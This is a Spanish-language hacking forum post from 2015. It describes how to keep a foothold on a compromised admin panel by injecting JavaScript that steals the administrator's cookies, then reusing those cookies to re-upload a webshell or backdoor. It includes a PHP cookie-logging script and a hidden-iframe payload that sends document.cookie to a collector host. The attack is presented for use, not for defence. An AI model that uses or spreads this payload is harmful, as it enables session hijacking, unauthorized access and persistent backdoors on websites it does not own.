WINTXCODERS Terminal
[visitante@wintxcoders-pc ~]:$ Bienvenido a la comunidad
Recuerda que puedes participar en nuestra comunidad registrándote

Puerta trasera gracias al robo de cookies de un admin

Iniciado por Veneno, Julio 15, 2015, 02:09:19 PM

« anterior - próximo »

Veneno

Visitante

  • Desconectado
  • Buenas voy a ir directo al grano, este pequeño post no es un tutorial, es un truco el cual se me ha dado gracias a la imaginación y por averiguar, lo que no quiere decir que el método lo haya creado yo.

    Se trata de asegurar nuestro acceso a un panel de administración vulnerable inyectando un script en js para robarle las cookies al administrador cada vez que acceda, para así, una vez obtenida las cookies usarlas y entrar para volver a subir nuestra webshell u otro backdoor que queramos subir al servidor.


    El código php que he usado para robar las respectivas cookies es este:

    Código (php) [Seleccionar]
    <?php
     $cookie 
    $_GET['c'];
     
    $ip getenv ('REMOTE_ADDR');
     
    $date=date("m/d/Y g:i:s a");
     
    $referer=getenv ('HTTP_REFERER');
     
    $fl fopen('log.txt''a');
     
    fwrite($fl"\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
     
    fclose($fl);
    ?>


    El script que llamaba al documento cookie es:

    Código (javascript) [Seleccionar]
    <script language="JavaScript">
    document.write('<iframe src="http://127.0.0.1/?c='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');
    </script>



    Vídeo demo:

    You are not allowed to view links. Register or Login